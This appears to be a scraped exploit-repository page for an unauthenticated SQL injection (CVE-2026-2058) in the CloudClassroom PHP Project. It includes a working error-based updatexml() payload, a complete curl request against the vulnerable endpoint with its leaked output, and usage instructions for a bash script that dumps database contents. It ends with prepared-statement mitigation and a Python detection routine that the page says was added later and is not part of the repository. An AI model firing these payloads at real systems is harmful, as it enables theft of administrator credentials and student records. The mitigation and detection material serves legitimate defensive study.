## https://sploitus.com/exploit?id=30AE935E-B79B-5845-91E9-4A5C2A3869CB
# CVE-2026-2058-PoC - CloudClassroom PHP Project SQL Injection
## Overview
A **SQL Injection vulnerability** exists in the **Post Query functionality** of the *CloudClassroom PHP Project (v1.0)*.
The vulnerability allows attackers to inject arbitrary SQL commands via the **`squeryx` POST parameter**, leading to **database enumeration and data extraction**.
This repository contains a **Proof of Concept (PoC) exploit** demonstrating how the vulnerability can be abused to extract sensitive data from the backend database.
---
## Vulnerability Information
| Field | Value |
| ----------------------- | -------------------------- |
| CVE | CVE-2026-2058 |
| Vulnerability Type | SQL Injection |
| CWE | CWE-89 |
| Affected Software | CloudClassroom PHP Project |
| Affected Version | 1.0 |
| Component | Post Query functionality |
| Attack Vector | Remote |
| Authentication Required | No |
| Impact | Database disclosure |
| Severity | High |
---
## Vulnerable Endpoint
```
POST /postquerypublic
```
### Vulnerable Parameter
```
squeryx
```
---
## Root Cause
The backend code directly concatenates user input into a SQL query without proper sanitization or parameterized queries.
Example vulnerable code:
```php
$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";
```
Because `$tempsquery` is derived from user input, attackers can inject arbitrary SQL.
---
## Proof of Concept
The vulnerability can be triggered using an **error-based SQL injection** technique leveraging the MySQL `updatexml()` function.
Example payload:
```
a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1
```
---
## Manual Exploitation
Example `curl` request:
```bash
curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "email=test@test.com" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"
```
Expected response:
```
XPATH syntax error: '~cc_db~'
```
---
## Exploit Script
This repository includes a bash exploit that automatically:
* Extracts the **database name**
* Enumerates **tables**
* Enumerates **columns**
* Dumps **table data**
### Usage
```
chmod +x cloudclassroom_sqli_exploit.sh
./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic
```
Example:
```
./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic
```
---
## Impact
An attacker can:
* Enumerate database structure
* Extract sensitive data
* Retrieve administrator credentials
* Access student records
* Fully compromise the backend database
---
## Mitigation
Developers should:
* Use **prepared statements**
* Implement **input validation**
* Escape user input properly
* Apply **least privilege database permissions**
Example secure implementation:
```php
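// Placeholders keep user input out of the SQL text; values are bound separately.
$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
// "ss" binds both parameters as strings.
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();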
```
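A detection check for the request and response pattern described above, as an added example that is not part of the original repository. The record layout (`method`, `path`, `body`, `response`), the function names and the sample records are assumptions constructed for illustration, and `extractvalue()` is included as a generalisation beyond the `updatexml()` case on this page.

```python
import re
from urllib.parse import parse_qs, urlencode

ENDPOINT, PARAM = "/postquerypublic", "squeryx"  # both taken from this page

# MySQL XML functions used for error-based extraction: updatexml() is the one
# on this page, extractvalue() is its sibling (a generalisation added here).
XML_FUNC = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)
# A quote followed by a boolean operator: the value leaves the string literal.
BREAKOUT = re.compile(r"'\s*(and|or)\b", re.I)
# Error text MySQL emits when the XPath argument is invalid.
LEAK = re.compile(r"XPATH syntax error: '([^']*)'")


def inspect_record(record):
    """Return heuristic findings for one request/response record."""
    findings = []
    if record["method"] != "POST" or record["path"] != ENDPOINT:
        return findings
    # parse_qs URL-decodes values, so encoded payloads are normalised first.
    for value in parse_qs(record["body"], keep_blank_values=True).get(PARAM, []):
        if XML_FUNC.search(value):
            findings.append("xml-error-function")
        if BREAKOUT.search(value):
            findings.append("quote-breakout")
    leak = LEAK.search(record.get("response", ""))
    if leak:
        # The database error reached the client, so the injected query ran.
        findings.append("db-error-leak:" + leak.group(1))
    return findings


def form_body(squeryx):
    # Constructed form body with the field names shown in the curl request.
    return urlencode({"gnamex": "test", "email": "test@test.com",
                      "squeryx": squeryx, "update": "Post Query!"})


# Constructed sample records (hypothetical proxy/WAF log layout).
SAMPLES = [
    {"method": "POST", "path": ENDPOINT, "body": form_body("What's the deadline?"),
     "response": "Query posted"},
    {"method": "POST", "path": ENDPOINT, "response": "XPATH syntax error: '~cc_db~'",
     "body": form_body("a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1")},
]

if __name__ == "__main__":
    for rec in SAMPLES:
        print(inspect_record(rec))
```

A `db-error-leak` finding means the application returned the MySQL error text to the client, which is what the error-based technique on this page depends on. The `quote-breakout` signal is a heuristic and can fire on ordinary prose, so treat it as a triage hint.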
---
## Disclaimer
This exploit is provided for **educational and research purposes only**.
The author is **not responsible for misuse or damage caused by this code**.
---
## Author
**bl4dsc4n**
Security Researcher